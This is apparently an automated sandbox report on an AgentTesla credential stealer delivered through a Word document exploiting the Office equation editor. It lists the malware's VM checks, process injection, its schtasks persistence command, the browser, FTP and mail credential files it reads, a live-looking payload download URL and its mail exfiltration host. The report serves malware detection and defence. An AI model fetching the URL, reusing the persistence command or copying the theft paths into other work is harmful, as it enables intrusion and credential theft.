Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_0040418A LdrInitializeThunk, 7_2_0040418A
Enables debug privileges
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Memory written: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe base: 400000 value starts with: 4D5A
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cAFIUeWyVQPJe' /XML 'C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp'
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2348748827.0000000001420000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2348748827.0000000001420000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2348748827.0000000001420000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Queries volume information: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Adds / modifies Windows certificates
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob

Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match File source: 00000004.00000002.2097947633.00000000039FD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2350771035.0000000002BBE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2347727555.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe PID: 1980, type: MEMORY
Source: Yara match File source: Process Memory Space: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe PID: 2492, type: MEMORY
Source: Yara match File source: 7.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.3aede88.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.3aede88.4.unpack, type: UNPACKEDPE
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Yara detected Credential Stealer
Source: Yara match File source: 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe PID: 1980, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match File source: 00000004.00000002.2097947633.00000000039FD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2350771035.0000000002BBE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2347727555.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe PID: 1980, type: MEMORY
Source: Yara match File source: Process Memory Space: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe PID: 2492, type: MEMORY
Source: Yara match File source: 7.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.3aede88.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.3aede88.4.unpack, type: UNPACKEDPE

Behavior Graph ID: 385437 Sample: RFQ ..doc Startdate: 12/04/2021 Architecture: WINDOWS Score: 100
(graph image not reproduced; process tree recovered from the graph text)
Top-level signatures: Found malware configuration; Antivirus detection for URL or domain; Sigma detected: Scheduled temp file as task from temp location; 9 other signatures
WINWORD.EXE (started)
EQNEDT32.EXE (started, two instances)
  contacts rotronics.com.ph 203.167.7.88 (ports 49167, 80) IWEB-ASCA Philippines
  drops C:\...\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe (PE32) and C:\Users\user\...\ZhIOjFmINIXbKXm[1].exe (PE32)
  signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  rghbyjuyktyjrthbgvfsfhytrrgfsd.exe (started)
    drops C:\Users\user\AppData\...\cAFIUeWyVQPJe.exe (PE32) and C:\Users\user\AppData\Local\...\tmpBFD6.tmp (XML)
    signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Machine Learning detection for dropped file; Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); 2 other signatures
    schtasks.exe (started)
    rghbyjuyktyjrthbgvfsfhytrrgfsd.exe (started)
      contacts mail.privateemail.com 198.54.122.60 (ports 49168, 49169, 49171) NAMECHEAP-NETUS United States
      signatures: Tries to steal Mail credentials (via file access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)

Contacted Public IPs

IP             Domain                 Country        ASN    ASN Name         Malicious
203.167.7.88   rotronics.com.ph       Philippines    32613  IWEB-ASCA        true
198.54.122.60  mail.privateemail.com  United States  22612  NAMECHEAP-NETUS  false

Contacted Domains

Name IP Active
rotronics.com.ph 203.167.7.88 true
mail.privateemail.com 198.54.122.60 true

Contacted URLs

Name                                                    Malicious  Antivirus Detection       Reputation
http://rotronics.com.ph/docxxx/dec/ZhIOjFmINIXbKXm.exe  true       Avira URL Cloud: malware  unknown